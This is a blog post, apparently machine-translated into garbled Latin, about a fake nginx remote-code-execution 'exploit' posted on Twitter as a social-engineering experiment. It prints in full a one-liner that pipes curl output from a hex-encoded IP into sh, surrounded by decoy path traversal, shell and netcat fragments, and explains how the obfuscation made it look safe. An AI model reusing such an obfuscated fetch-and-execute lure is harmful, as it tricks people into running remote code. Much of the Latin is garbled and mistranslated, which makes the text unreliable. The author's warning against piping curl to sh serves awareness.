Success experimentum sociale cum fictis nginx facinus

Nota. transl.: auctor nota originalis, die 1 mensis Iunii publicata, experimentum ducere decrevit inter eos, quorum interest in securitate informationis. Hoc facere, fictum commentum paravit ad vulnerabilitatem detectam in servo interretiali et in arcu suo collocavit. Eius suppositiones - statim expositae a peritis qui manifestam deceptionem in codice viderent - non modo non veniebant. contenta reprehendo.

TL;DR: Noli uti file pipelining in sh vel vercundus in aliquo casu. Magna haec via est ut computatrum tuum imperium amittas.

Volo tecum communicare brevem fabulam de facinore comico PoC qui die 31 mensis Maii creatus est. Confestim apparuit responsio ad nuntium e Alisa Esage Shevchenko, membrum Nulla dies inceptum (ZDI), informationes de vulnerabilitate in NGINX ducens ad RCE (codex remotis executionis) mox patebit. Cum NGINX potestates multae paginae, nuntius bombshellus esse debet. Sed propter moras in processu "responsabili revelationis", singula eorum quae acciderunt ignorabantur - hoc est norma ZDI procedendi.

Tweet de vulnerability detectionem in NGINX

Novam obfuscationis technicam in Crispum operam peractum, primum exemplaribus viminibus adscripsi et "PoC operantem" constans ex una linea codicis, quae vulnerabilitatem detectam velut agebat. Nimirum hoc erat nugae plenariae. Posui me statim exponi, et ut optime duos retweetes (o bene).

Tweet cum fake facinus

Sed quid deinde acciderit non potui existimare. Mea tweet popularis skyrocketed. Mire, momento temporis (15:00 Moscuae Iunii 1) pauci homines intellexerunt hoc fictum esse. Multi homines eam retweet sine ulla reprimendo ( nedum admirantes amabilem ASCII graphics outputs ).

Spectate quam formosa est!

Cum omnes hae ansae et colores magnae sint, manifestum est quod homines in eorum machina ad eos videndos codicem currere debuerunt. Feliciter navigatores eodem modo laborant, et cum eo quod ego non vere in legali negotio laborare cupimus, codicem in meo situ sepultum erat, sicut resonare vocat, sine ullo codice addito instituere vel exequi conanti.

Parvus digressio; netspooky, dnz *, me et alios guys ex biga Thugcrowd Diversis modis lusimus ad obfuscare Crispum mandata aliquantisper nunc quia frigus est... et geeks sumus. netspooky et dnz aliquot methodos novas inventas, quae mihi perquam polliceri videbantur. Iocum adiunxi et IP ad conversiones decimales ad dolis loculos addendo conatus sum. Evenit ut IP etiam ad formam hexadecimalem converti possit. Praeterea, Crispum et pleraque alia NIX instrumenta feliciter edunt hexadecimales IPS! Erat igitur res iusta de creando ad persuadendum et securum aspectum in acie imperandi. Tandem hoc unum conlocavi;

curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost

Socio-electronic engineering (SEE) - plus quam iustus hamatae

Salus et familiaritas maior pars huius experimenti fuerunt. Quas res bene gestas esse arbitror. Praeceptum lineae securitatis evidenter implicatam referendo ad "127.0.0.1" (notum localem exercitum). Localhost securum censetur et in eo notitia computatorium tuum numquam relinquit.

Familiaritas fuit secunda pars experimenti SEDIS clavis. Cum auditorium scopum imprimis constabat ab hominibus notis fundamentalibus securitatis computatralis, magni momenti erat codicem creare ut partes eius familiares et familiares videbantur (et ideo tutus). De commodato elementis veteris facinoris notiones et eas inusitato modo deducentes valde prosperas esse probavit.

Subter accurata analysis unius lineae est. Omnia in hoc indice wears medicamine naturaet ad operationem eius actualem nihil requiritur.

Quae elementa vere necessaria sunt? Hoc -gsS, -O 0x0238f06a, |sh et telam ipsum servo. Tela server non continebat aliquas malicias instructiones, sed solum ASCII graphics utentes mandata echo in scripto continebat index.html. Utentis ingressus lineam |sh in medio, index.html onerata et supplicio affecit. Fortunate custodes interretiales non male habebant.

• ../../../%00 — ultra presul repraesentat;
• ngx_stream_module.so — iter ad NGINX temere moduli;
• /bin/sh%00<'protocol:TCP' - sumus velut launching /bin/sh in machina scopo et output ad TCP alveum redigere;
• -O 0x0238f06a#PLToffset - secretum medicamentum, suppletum est #PLToffsetut viderem quasi memoriam cinguli quodam modo in PLT contento;
• |sh; — Aliud fragmentum magni momenti. Nobis opus est ad output ad sh/bash redigere ut signum exsequatur quod ab oppugnatione interretiali servo sito ad 0x0238f06a (2.56.240.x);
• nc /dev/tcp/localhost - phantasma in quo netcat refers to /dev/tcp/localhostut tuta omnia cernerent. Nam in acie decoris nihil agit.

Hoc concludit decoding scripturae unius lineae et disceptatio de aspectibus "socio-electronicae machinationis" (intricatae hamatae).

Servo interretiali configurationis et countermeasures

Cum magna pars signatorum meorum infosec/hackers sunt, placuit ut interretialem servitorem paulo repugnantiorem expressionibus "curae" ex parte eorum reddere decrevi, ita ut guys aliquid facere (et iocum esset. erigi). Non recensebimus omnes casus hic cum experimentum adhuc continuatur, sed hic pauca sunt quae ministrans facit;

• Active monitores distributionem in certa retis socialibus inceptis substituunt ac varias praevias ailnthubmas ad confirmandum utentem ad deprimendum nexum.
• Redirects Chrome/Mozilla/Safari/etc ad Thugcrowd promo video loco ostendens testam scripturam.
• Observat obvios signa intrusionis/blatintia caesim, et tunc incipit redirectio petitiones ad NSA ministrantium (ha!).
• Instruit Troianum, sicut etiam BIOS rootkit, in omnibus computatoriis quorum utentes hospitem ex iusto navigatro visitant (tantum kidding!).

Parva pars antimers

In hoc casu, unicum propositum meum fuit ut quasdam Apache lineamenta - nominatim, regulas frigidas ad redirectionem petitionum, - et cogitabam: quidni?

NGINX Expletandum (Verus!)

ut subscribe @alisaesage in Twitter et magnum opus ZDI sequere in appellandis vulnerabilitates reales et occasiones faciendi in NGINX. Eorum labor me semper fascinavit et gratus sum Aliciae ob eius patientiam cum omnibus commemorationibus ac notificationibus meis stultorum tweorum causatorum. Fortunate, etiam aliquod bonum fecit: adiuvit conscientias NGINX vulnerabilities, necnon problematum abusu Crispi causatos.

Source: www.habr.com